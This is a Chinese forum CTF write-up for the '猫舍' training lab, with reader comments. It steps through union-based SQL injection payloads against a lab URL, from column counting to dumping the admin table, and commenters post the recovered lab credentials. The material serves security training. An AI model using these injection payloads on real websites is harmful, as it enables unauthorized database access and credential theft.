猫舍 writeup

Track-mss   ·   发表于 2019-1-30   ·   CTF&WP专版
目标url:http://117.41.229.122:8003/?id=1

第一步,判断是否存在sql注入漏洞
构造 ?id=1 and 1=1 ,回车


页面返回正常

构造 ?id=1 and 1=2 ,回车


页面不正常,初步判断这里 可能 存在一个注入漏洞


第二步:判断字段数
构造 ?id=1 and 1=1 order by 1 回车


页面正常

构造 ?id=1 and 1=1 order by 2 回车


页面正常

构造 ?id=1 and 1=1 order by 3 回车


页面返回 错误,判断字段数为   2


第三步:判断回显点
构造 ?id=1 and 1=2 union select 1,2 回车


页面出现了  2  ,说明我们可以在数字  2  处显示我们想要的内容


第四步:查询相关内容
查询当前数据库名
构造 ?id=1 and 1=2 union select 1,database() 回车



查询当前数据库版本

构造 ?id=1 and 1=2 union select 1,version() 回车

查询当前数据库 表名
构造 ?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1 回车

绝大数情况下,管理员的账号密码都在admin表里


查询字段名
构造 ?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1 回车

构造 ?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 1,1 回车

构造 ?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 2,1 回车


查出 admin 表里 有  id   username  password  三个字段


查询字段内容
构造 ?id=1 and 1=2 union select 1,username from admin  limit 0,1 回车


构造 ?id=1 and 1=2 union select 1,password from admin  limit 1,1 回车


limit 1,1 没有回显,说明只有一个用户

构造 ?id=1 and 1=2 union select 1,password from admin  limit 0,1 回车


得到管理员账号和密码


注:之前为了防止某些同学不思考直接复制内容,所以故意写错几个单词,没想到给各位同学带来困扰,深表歉意。

打赏我,让我更有动力~

24 Reply   |  Until 15小时前 | 46300 View

adm1n
发表于 2019-1-30

不错不错,

评论列表

  • 加载数据中...

编写评论内容

tanhua
发表于 2019-4-2

教材假的

评论列表

  • 加载数据中...

编写评论内容

luok
发表于 2019-4-14

查询当前数据库 表名构造 ?id=1 and 1=2 union select 1,table_name from information_schema.tables wherer table_schema=database() limit 0,1 回车

单词错了,红色标记  where 条件

评论列表

  • 加载数据中...

编写评论内容

ahrui
发表于 2019-4-16

构造1=2时页面正常像什么都没发生是为什么


评论列表

  • 加载数据中...

编写评论内容

掌控安全–东
发表于 2019-5-24

 

记得看下面注意事项

评论列表

  • 加载数据中...

编写评论内容

ljxzy123
发表于 2019-6-12

不错不错,学习了


评论列表

  • 加载数据中...

编写评论内容

1739770884
发表于 2019-7-31

大佬们 有个疑问

为什么order by的时候判断出2个字段

结果下面的操作是3个字段?

是两张表吗?


评论列表

  • 加载数据中...

编写评论内容

jk
发表于 2019-11-10

flag 不是hellohack

评论列表

  • 加载数据中...

编写评论内容

eagle006
发表于 11个月前

我按照上面的操作还发现还有一个用户:

密码是:


不知道对不对,请老师指正


评论列表

  • 加载数据中...

编写评论内容

心怀天下
发表于 10个月前

评论列表

  • 加载数据中...

编写评论内容

tmxu
发表于 9个月前

评论列表

  • 加载数据中...

编写评论内容

free_travel
发表于 8个月前

评论列表

  • 加载数据中...

编写评论内容

没学会不改名
发表于 8个月前

单词错了我们这些英语不好得怎么办

评论列表

  • 加载数据中...

编写评论内容

hack_2_something
发表于 8个月前

只有两个显示位,为啥,能在页面显示出后台有4个数据库啊.
admin、dirs、news、xss。
还有一个问题,就是为啥在sql注入的时候,为什么在这个实验中,不需要加入单引号,来注释掉原来数据库中存在的单引号呢

评论列表

  • 加载数据中...

编写评论内容

kingzzp
发表于 6个月前

谷歌浏览器不能用吗?自动变了

评论列表

  • 加载数据中...

编写评论内容

supejkj
发表于 6个月前


一直输入的是zkaqbanban 不对 然后输入用户名就对了0.0

评论列表

  • 加载数据中...

编写评论内容

kakas1992
发表于 5个月前

请问哪位大神有oracle靶场源码啊。小弟想自己线下练习

评论列表

  • 加载数据中...

编写评论内容

baolongfengu
发表于 4个月前

没搞懂提交flag是啥意思,把数据库逛完了都没看到flag这个词,原来就是提交密码啊。

数据库maoshe下查到了4张表:admin,dirs,news,xss
database[maoshe].table_name[admin].column_name[Id,username,password]:
1,admin,hellohack
2,ppt领取微信,zkaqbanban
database[maoshe].table_name[dirs].column_name[paths]:
无内容
database[maoshe].table_name[news].column_name[id,content]:
id 1 为:正文内容
id 2 为:“工程师偷懒可还行”
id 3 为:扫描二维码领取东西
database[maoshe].table_name[xss].column_name[id,user,pass]:
无内容

其中用了concat()和group_concat()查起来方便多了,不用一个一个的改查询对象,用法也很容易搜索到。

评论列表

  • 加载数据中...

编写评论内容

小生牛牛
发表于 4个月前

提交不了啊,hellohack

评论列表

  • 加载数据中...

编写评论内容

任永刚
发表于 4个月前

admin

zkaqbanban

hellohack

评论列表

  • 加载数据中...

编写评论内容
1 2 / 2 跳转 尾页
LoginCan Publish Content
返回顶部 投诉反馈

掌控者 © 2016 - 2020. All Rights Reserved. 掌控者

Powered by 掌控者